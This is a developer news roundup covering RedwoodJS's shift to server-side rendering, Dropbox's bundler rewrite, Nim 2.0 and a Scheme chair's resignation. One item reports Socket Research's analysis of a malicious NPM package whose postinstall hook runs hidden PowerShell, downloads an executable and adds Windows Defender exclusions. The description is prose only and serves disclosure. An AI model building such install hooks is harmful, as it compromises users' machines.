Dev News: RedwoodJS Drops Jamstack, Dropbox Reduces JS Bundles
“For the last year, the RedwoodJS team has been prototyping solutions to the framework’s lack of a proper server-side rendering (SSR) feature,” he wrote. “Today, I’m happy to announce that we have chosen to implement a modern SSR solution with a front-end server, leveraging React’s streaming capabilities. This will also allow us to add React Server Components (RSC) to Redwood as our solution to the many downsides of pure single page applications (SPAs).”
It’s a lot of acronyms, but Preston-Werner cited a list of reasons to switch to React Server Components (RSC), including:
- Better SEO performance in the form of statically rendered HTML delivered to the browser. With server rendering, that’s “baked in,” he added — an advantage over the SPA architecture;
- OG tags, which require statically delivered HTML to use. Again, server-side rendering solves for this use; and
- Providing API options to connect beyond the GraphQL API backend.
“It’s challenging to get top-notch performance out of Redwood in a Jamstack environment,” Preston-Werner wrote. “AWS Lambda’s cold start times, code payload limits, and execution timeouts are all hurdles that need to be considered. Most Redwood users today already choose a serverful deployment strategy for exactly these reasons.”
The original goal was to make it possible for most of Redwood’s features to work in serverless environments. But from now on, Redwood will be optimizing for serverful RSC and all the advantages that will bring.
“You can read a full account of RSC’s advantages elsewhere, but more of my favorites are: smaller bundle sizes shipped to the browser, large libraries can be run server-side only (more bundle savings), quicker hydration, and easy server-side secrets,” he wrote. “RSC is the future of React. The React team has made this very clear and we are lucky to be in touch with their amazing team members to help us along this path.”
It’s first change? A new bundler. The old one from 2014 didn’t incorporate many performance optimizations and was difficult to work with, Dropbox noted.
“While our existing bundler was relatively build-time efficient, it resulted in massive bundle sizes and proved to be a burden for engineers to maintain,” the post noted. “We relied on engineers to manually define which scripts to bundle with a package, and we simply shipped all packages involved in rendering a page with few optimizations.”
That became problematic over time, it added, creating multiple versions of bundled code, manual code splitting and no tree shaking.
“The latest combatant to enter the fray is an NPM package known as pyautodllxd,” Socket Search reported Monday. “This seemingly innocuous package was uploaded by an author named ‘T4hg’ and last updated on April 18, 2023.”
At first glance, ‘pyautodllxd’ doesn’t appear to impersonate any popular package or engage in typosquatting. Its purpose and target audience remain elusive, as both the ReadMe file and description were left blank. However, when Socket Research examined the postinstall command, it uncovered suspicious code.
The postinstall command runs a PowerShell command, suggesting that the attacker targets Windows operating systems, the research note pointed out.
“Upon closer inspection, we discovered a binary named ‘esquele.exe’ being downloaded from a Dropbox URL,” the post stated. “This stealthy approach allows the payload to be deployed without raising any red flags.”
After installation, the package simultaneously downloads the malicious executable and saves it in the temp folder for later execution. Socket Research noted that several vendors had marked the decoded PowerShell script as a malicious trojan.
The firm’s analysis found that pyautodllxd runs a hidden PowerShell window, downloads a script named
bypass.ps1, and uses the “Esquele” function to add exclusion paths for drives C:\ and D:\, bypassing Windows Defender’s real-time protection.
The Skeleton Squad left a cryptic message in Spanish in some of the packages published by T4hg, which translates to “They will all die in the hands of EsqueleSquad,” the research note added.
Nim v2.0 Released
Nim version 2.0 released earlier this month. Nim is a relatively new programming language, but it’s used in web development, systems programming, game development, artificial intelligence, data science and scientific computing. Among its advantages are its fast and efficient: Nim code can be compiled to native machine code. It’s also expressive and extensible, supporting metaprogramming. Finally, Nim code can be compiled to run on a variety of platforms, including Windows, Linux, macOS, and FreeBSD. So it has a lot to recommend it.
“This is an evolution (not revolution) of Nim, bringing ORC memory management as a default, along with many other new features and improvements,” the release note stated.
It also cautioned that “Nim is a programming language that is good for everything, but not for everybody.” Its customizable memory management makes it well suited for unforgiving domains such as hard real-time systems and system programming in general, the post stated.
Among the new features are:
- Better tuple unpacking. “Tuple unpacking for variables is now treated as syntax sugar that directly expands into multiple assignments,” the release note stated. “Along with this, tuple unpacking for variables can now be nested.”
- Improved type inference. “A new form of type inference called top-down inference has been implemented for a variety of basic cases,” the releases notes state.
- Forbidden tags. “Tag tracking now supports the definition of forbidden tags by the .forbids pragma which can be used to disable certain effects in proc types,” it added.
- A new standard libraries model. Essentially the overhauls its os module.
New users can download the language online.
John Cowan, the chair of the language R7RS-large project, resigned his position in a public post on Google Groups this week. That project oversees the use of Scheme as an active, rather than teaching, language.
“I have come to the conclusion that I can no longer serve as Chair. I am exhausted by the effort, and I do not think that there is any further hope that I can get sufficient agreement among the different players to have any hope of coming to a conclusion,” he wrote. “On the contrary, agreement is further away than ever, and people’s views are more and more entrenched.”
This Hacker News thread offers background information about Scheme.
Web Frameworks as Superheroes
This is simply too cute not to share: Developer Matija Sosic recently used the generative AI tool Midjourney to visualize web frameworks as superheroes. It features popular web frameworks such as Vue, React.js, Wasp and Ruby on Rails. React.js is heralded as the king of the frameworks, while Nest.js is literally a server-side beast of a character. The Wasp contributor promises to do more frameworks in the future.